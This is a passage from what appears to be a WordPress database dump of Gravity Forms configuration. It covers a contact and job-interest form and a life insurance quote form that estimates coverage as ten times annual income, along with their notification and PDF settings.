subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"choices\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enableEnhancedUI\":0,\"layoutGroupId\":\"e2a3bdf0\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"fields\":\"\",\"personalDataExport\":false,\"personalDataErase\":false,\"displayOnly\":\"\"},{\"type\":\"textarea\",\"id\":11,\"formId\":2,\"label\":\"How did you hear about us?\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"small\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"form_id\":\"\",\"useRichTextEditor\":false,\"enableEnhancedUI\":0,\"layoutGroupId\":\"19373d81\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\"},{\"type\":\"select\",\"id\":10,\"formId\":2,\"label\":\"What position are you interested in?\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"validateState\":true,\"inputs\":null,\"choices\":[{\"text\":\"Benefits Specialist\",\"value\":\"Benefits Specialist\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Sales Manager Trainee\",\"value\":\"Sales Manager Trainee\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Call Center Specialist\",\"value\":\"Call Center Specialist\",\"isSelected\":false,\"price\":\"\"}],\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":\"\",\"enablePrice\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"c8fdcfbb\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\"}],\"descriptionPlacement\":\"above\",\"postContentTemplateEnabled\":false,\"postTitleTemplateEnabled\":false,\"postTitleTemplate\":\"\",\"postContentTemplate\":\"\",\"lastPageButton\":null,\"pagination\":null,\"firstPageCssClass\":null,\"nextFieldId\":12,\"subLabelPlacement\":\"above\",\"cssClass\":\"\",\"enableHoneypot\":true,\"enableAnimation\":false,\"save\":{\"enabled\":false,\"button\":{\"type\":\"link\",\"text\":\"Save and Continue Later\"}},\"limitEntries\":false,\"limitEntriesCount\":\"\",\"limitEntriesPeriod\":\"\",\"limitEntriesMessage\":\"\",\"scheduleForm\":false,\"scheduleStart\":\"\",\"scheduleStartHour\":\"\",\"scheduleStartMinute\":\"\",\"scheduleStartAmpm\":\"\",\"scheduleEnd\":\"\",\"scheduleEndHour\":\"\",\"scheduleEndMinute\":\"\",\"scheduleEndAmpm\":\"\",\"schedulePendingMessage\":\"\",\"scheduleMessage\":\"\",\"requireLogin\":false,\"requireLoginMessage\":\"\",\"feeds\":{\"gravityformsadvancedpostcreation\":[]},\"version\":\"2.7.3\",\"validationSummary\":\"1\",\"requiredIndicator\":\"asterisk\",\"customRequiredIndicator\":\"\",\"markupVersion\":2,\"autoResponder\":{\"from\":\"{admin_email}\",\"subject\":\"We have received your inquiry\",\"message\":\"<p>Hi there {Name (First):1.3},<\\/p><p>Thank you for getting in touch. We have received your inquiry and will get back to you within one business day.<\\/p>\",\"toField\":\"2\"},\"delete_entry\":\"\",\"delete_entry_condition\":\"\",\"delete_entry_period\":\"\",\"delete_entry_units\":\"hour\",\"template_id\":\"basic_contact\",\"id\":2,\"saveButtonText\":\"Save and Continue Later\",\"honeypotAction\":\"spam\",\"deprecated\":\"\",\"saveEnabled\":\"\",\"is_active\":\"1\",\"date_created\":\"2023-04-02 19:48:07\",\"is_trash\":\"0\",\"personalData\":{\"preventIP\":true,\"retention\":{\"policy\":\"retain\",\"retain_entries_days\":\"1\"},\"exportingAndErasing\":{\"enabled\":false,\"identificationField\":2,\"columns\":{\"ip\":{\"export\":false,\"erase\":false},\"source_url\":{\"export\":false,\"erase\":false},\"user_agent\":{\"export\":false,\"erase\":false}}}}}',NULL,'{\"5179518e5e160\":{\"type\":\"message\",\"id\":\"5179518e5e160\",\"isDefault\":true,\"message\":\"Thank you for contacting us! We will get in touch with you shortly.\",\"name\":\"Default Confirmation\",\"disableAutoformat\":false,\"pageId\":0,\"url\":\"\",\"queryString\":\"\",\"conditionalLogic\":[]}}','{\"51794abf1f0d1\":{\"id\":\"51794abf1f0d1\",\"from\":\"info@JSuttonFinacial.com\",\"subject\":\"We have received your inquiry\",\"message\":\"<p>Hi there {Name (First):1.3},<\\/p><p>Thank you for getting in touch. We have received your inquiry and will get back to you within one business day.<\\/p>\",\"toType\":\"field\",\"toField\":\"2\",\"to\":\"2\",\"event\":\"form_submission\",\"name\":\"User Notification\",\"service\":\"wordpress\",\"toEmail\":\"\",\"routing\":null,\"fromName\":\"\",\"replyTo\":\"\",\"bcc\":\"\",\"disableAutoformat\":false,\"notification_conditional_logic_object\":\"\",\"notification_conditional_logic\":\"0\",\"conditionalLogic\":null,\"cc\":\"\",\"enableAttachments\":false},\"51794abf1f0d2\":{\"id\":\"51794abf1f0d2\",\"from\":\"{admin_email}\",\"subject\":\"New submission from {form_title}\",\"message\":\"{all_fields}\",\"toType\":\"email\",\"to\":\"info@JSuttonFinacial.com\",\"event\":\"form_submission\",\"name\":\"Admin Notification\",\"service\":\"wordpress\",\"toEmail\":\"info@JSuttonFinacial.com\",\"toField\":\"\",\"routing\":null,\"fromName\":\"\",\"replyTo\":\"\",\"bcc\":\"\",\"disableAutoformat\":false,\"notification_conditional_logic_object\":\"\",\"notification_conditional_logic\":\"0\",\"conditionalLogic\":null,\"cc\":\"\",\"enableAttachments\":false}}'),(3,'{\"title\":\"Quote Form (1)\",\"description\":\"\",\"labelPlacement\":\"top_label\",\"descriptionPlacement\":\"below\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\",\"width\":\"auto\",\"location\":\"bottom\",\"layoutGridColumnSpan\":12},\"fields\":[{\"type\":\"date\",\"id\":3,\"formId\":1,\"label\":\"Date of birth\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":[{\"id\":\"3.1\",\"label\":\"Month\",\"name\":\"\"},{\"id\":\"3.2\",\"label\":\"Day\",\"name\":\"\"},{\"id\":\"3.3\",\"label\":\"Year\",\"name\":\"\"}],\"dateType\":\"datefield\",\"dateFormat\":\"mdy\",\"dateFormatPlacement\":\"below\",\"calendarIconType\":\"none\",\"description\":\"Age is one of the many factors that determines your life insurance rates.\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"calendarIconUrl\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"8751397a\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"checkboxLabel\":\"\"},{\"type\":\"radio\",\"id\":4,\"formId\":1,\"label\":\"Gender\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"validateState\":true,\"inputs\":null,\"choices\":[{\"text\":\"Female\",\"value\":\"Female\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Male\",\"value\":\"Male\",\"isSelected\":false,\"price\":\"\"}],\"description\":\"Most insurers do not offer a gender-neutral or nonbinary option on their applications, but if you are transgender, you can choose your actual gender, not your gender assigned at birth.\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box btn_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":\"\",\"enableOtherChoice\":\"\",\"enablePrice\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"8c71f0bc\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"checkboxLabel\":\"\"},{\"type\":\"number\",\"id\":5,\"formId\":1,\"label\":\"Annual income\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"numberFormat\":\"currency\",\"description\":\"Your total annual salary and\\/or earnings, before taxes.\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"enableCalculation\":false,\"rangeMin\":false,\"rangeMax\":false,\"calculationFormula\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"4ab163e7\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationRounding\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"checkboxLabel\":\"\"},{\"type\":\"radio\",\"id\":6,\"formId\":1,\"label\":\"Do you have a spouse or partner?\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"validateState\":true,\"inputs\":null,\"choices\":[{\"text\":\"Yes\",\"value\":\"Yes\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"No\",\"value\":\"No\",\"isSelected\":false,\"price\":\"\"}],\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box btn_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":\"\",\"enableOtherChoice\":\"\",\"enablePrice\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"b1e81976\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\"},{\"type\":\"number\",\"id\":7,\"formId\":1,\"label\":\"Number of children under age 18\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"numberFormat\":\"decimal_dot\",\"description\":\"We\'ll take the number and ages of your children into account when calculating your coverage.\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"enableCalculation\":false,\"rangeMin\":\"\",\"rangeMax\":\"\",\"calculationFormula\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"fd371e7f\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationRounding\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"checkboxLabel\":\"\"},{\"type\":\"number\",\"id\":13,\"formId\":1,\"label\":\"Age of youngest child\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"numberFormat\":\"decimal_dot\",\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":{\"enabled\":true,\"actionType\":\"show\",\"logicType\":\"all\",\"rules\":[{\"fieldId\":\"7\",\"operator\":\">\",\"value\":\"0\"}]},\"enableCalculation\":false,\"rangeMin\":\"\",\"rangeMax\":\"\",\"calculationFormula\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enableEnhancedUI\":0,\"layoutGroupId\":\"9699ccdc\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationRounding\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\"},{\"type\":\"radio\",\"id\":14,\"formId\":1,\"label\":\"Do you want to include an additional amount to cover college costs?\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"validateState\":true,\"inputs\":null,\"choices\":[{\"text\":\"Yes\",\"value\":\"Yes\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"No\",\"value\":\"No\",\"isSelected\":false,\"price\":\"\"}],\"description\":\"We\'ll add an amount per child that represents the average cost of a four-year degree.\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box btn_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"conditionalLogic\":{\"enabled\":true,\"actionType\":\"show\",\"logicType\":\"all\",\"rules\":[{\"fieldId\":\"7\",\"operator\":\">\",\"value\":\"0\"}]},\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enableOtherChoice\":\"\",\"enablePrice\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"d63412d9\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\"},{\"type\":\"number\",\"id\":8,\"formId\":1,\"label\":\"Total household debt\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"numberFormat\":\"currency\",\"description\":\"Include all debts, such as mortgages, student loans, car loans, credit cards, etc.\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"enableCalculation\":false,\"rangeMin\":false,\"rangeMax\":false,\"calculationFormula\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enableEnhancedUI\":0,\"layoutGroupId\":\"dfa19c81\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationRounding\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"checkboxLabel\":\"\"},{\"type\":\"number\",\"id\":9,\"formId\":1,\"label\":\"Total household savings\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"numberFormat\":\"currency\",\"description\":\"Your total household liquid savings (i.e. the funds are accessible without taxes or other penalties whenever you need them).\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"enableCalculation\":false,\"rangeMin\":false,\"rangeMax\":false,\"calculationFormula\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enableEnhancedUI\":0,\"layoutGroupId\":\"571a7623\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationRounding\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"checkboxLabel\":\"\"},{\"type\":\"name\",\"id\":10,\"formId\":1,\"label\":\"Name\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"nameFormat\":\"advanced\",\"inputs\":[{\"id\":\"10.2\",\"label\":\"Prefix\",\"name\":\"\",\"autocompleteAttribute\":\"honorific-prefix\",\"choices\":[{\"text\":\"Dr.\",\"value\":\"Dr.\"},{\"text\":\"Miss\",\"value\":\"Miss\"},{\"text\":\"Mr.\",\"value\":\"Mr.\"},{\"text\":\"Mrs.\",\"value\":\"Mrs.\"},{\"text\":\"Ms.\",\"value\":\"Ms.\"},{\"text\":\"Mx.\",\"value\":\"Mx.\"},{\"text\":\"Prof.\",\"value\":\"Prof.\"},{\"text\":\"Rev.\",\"value\":\"Rev.\"}],\"isHidden\":true,\"inputType\":\"radio\"},{\"id\":\"10.3\",\"label\":\"First\",\"name\":\"\",\"autocompleteAttribute\":\"given-name\",\"placeholder\":\"First\"},{\"id\":\"10.4\",\"label\":\"Middle\",\"name\":\"\",\"autocompleteAttribute\":\"additional-name\",\"isHidden\":true},{\"id\":\"10.6\",\"label\":\"Last\",\"name\":\"\",\"autocompleteAttribute\":\"family-name\",\"placeholder\":\"Last\"},{\"id\":\"10.8\",\"label\":\"Suffix\",\"name\":\"\",\"autocompleteAttribute\":\"honorific-suffix\",\"isHidden\":true}],\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"hidden_label\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"a4dfc8ae\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"checkboxLabel\":\"\",\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\"},{\"type\":\"email\",\"id\":11,\"formId\":1,\"label\":\"Email\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"autocompleteAttribute\":\"email\",\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"choices\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":6,\"emailConfirmEnabled\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"6f91869d\",\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false},{\"type\":\"phone\",\"id\":12,\"formId\":1,\"label\":\"Phone\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"phoneFormat\":\"international\",\"autocompleteAttribute\":\"tel\",\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"choices\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":6,\"enableEnhancedUI\":0,\"layoutGroupId\":\"6f91869d\",\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false},{\"type\":\"number\",\"id\":15,\"formId\":1,\"label\":\"Your estimated amount of insurance needed is\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"numberFormat\":\"currency\",\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"q_btn\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":{\"enabled\":true,\"actionType\":\"show\",\"logicType\":\"all\",\"rules\":[{\"fieldId\":\"5\",\"operator\":\"isnot\",\"value\":\"\"},{\"fieldId\":\"10.3\",\"operator\":\"isnot\",\"value\":\"\"},{\"fieldId\":\"10.6\",\"operator\":\"isnot\",\"value\":\"\"},{\"fieldId\":\"11\",\"operator\":\"isnot\",\"value\":\"\"},{\"fieldId\":\"12\",\"operator\":\"isnot\",\"value\":\"\"}]},\"enableCalculation\":true,\"rangeMin\":false,\"rangeMax\":false,\"calculationFormula\":\"{Annual income:5} * 10\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enableEnhancedUI\":0,\"layoutGroupId\":\"def0c97f\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationRounding\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\"}],\"version\":\"2.7.2\",\"id\":3,\"markupVersion\":2,\"nextFieldId\":16,\"useCurrentUserAsAuthor\":true,\"postContentTemplateEnabled\":false,\"postTitleTemplateEnabled\":false,\"postTitleTemplate\":\"\",\"postContentTemplate\":\"\",\"lastPageButton\":null,\"pagination\":null,\"firstPageCssClass\":null,\"gfpdf_form_settings\":{\"640d602b58e17\":{\"name\":\"Quote\",\"template\":\"zadani\",\"notification\":{\"64074ce3dce45\":\"64074ce3dce45\"},\"filename\":\"quote\",\"conditionalLogic\":null,\"pdf_size\":\"A4\",\"custom_pdf_size\":[\"\",\"\",\"millimeters\"],\"orientation\":\"portrait\",\"font\":\"dejavusanscondensed\",\"font_size\":\"10\",\"font_colour\":\"#000000\",\"zadani_border_colour\":\"#CCCCCC\",\"show_form_title\":\"Yes\",\"enable_conditional\":\"Yes\",\"background_color\":\"#FFF\",\"background_image\":\"\",\"header\":\"\",\"first_header\":\"\",\"footer\":\"\",\"first_footer\":\"\",\"format\":\"Standard\",\"password\":\"\",\"privileges\":{\"copy\":\"copy\",\"print\":\"print\",\"print-highres\":\"print-highres\",\"modify\":\"modify\",\"annot-forms\":\"annot-forms\",\"fill-forms\":\"fill-forms\",\"extract\":\"extract\",\"assemble\":\"assemble\"},\"master_password\":\"\",\"image_dpi\":\"96\",\"save\":\"\",\"conditional\":\"\",\"rtl\":\"\",\"security\":\"\",\"public_access\":\"\",\"restrict_owner\":\"\",\"id\":\"640d602b58e17\",\"active\":true}},\"is_active\":\"1\",\"date_created\":\"2023-03-07 14:40:35\",\"is_trash\":\"0\",\"subLabelPlacement\":\"below\",\"requiredIndicator\":\"asterisk\",\"customRequiredIndicator\":\"(Required)\",\"cssClass\":\"tc\",\"saveButtonText\":\"Save & Continue\",\"limitEntries\":false,\"limitEntriesCount\":\"\",\"limitEntriesPeriod\":\"\",\"limitEntriesMessage\":\"\",\"scheduleForm\":false,\"scheduleStart\":\"\",\"scheduleEnd\":\"\",\"schedulePendingMessage\":\"\",\"scheduleMessage\":\"\",\"requireLogin\":false,\"requireLoginMessage\":\"\",\"honeypotAction\":\"abort\",\"validationSummary\":false,\"deprecated\":\"\",\"saveEnabled\":\"\",\"enableHoneypot\":false,\"enableAnimation\":false,\"save\":{\"enabled\":false,\"button\":{\"type\":\"link\",\"text\":\"Save & Continue\"}},\"scheduleStartHour\":\"\",\"scheduleStartMinute\":\"\",\"scheduleStartAmpm\":\"\",\"scheduleEndHour\":\"\",\"scheduleEndMinute\":\"\",\"scheduleEndAmpm\":\"\"}',NULL,'{\"64074ce3dcf26\":{\"id\":\"64074ce3dcf26\",\"name\":\"Default Confirmation\",\"isDefault\":true,\"type\":\"message\",\"message\":\"<p class=\\\"qut\\\" style=\\\"text-align: center;\\\">Your estimated amount of insurance needed is <strong>{Estimated Life insurance:15}<\\/strong><\\/p>\",\"url\":\"\",\"pageId\":\"\",\"queryString\":\"\",\"event\":\"\",\"disableAutoformat\":false,\"page\":\"\",\"conditionalLogic\":[]}}','{\"64074ce3dce45\":{\"id\":\"64074ce3dce45\",\"isActive\":true,\"to\":\"{admin_email}\",\"name\":\"Admin Notification\",\"event\":\"form_submission\",\"toType\":\"email\",\"subject\":\"New submission from 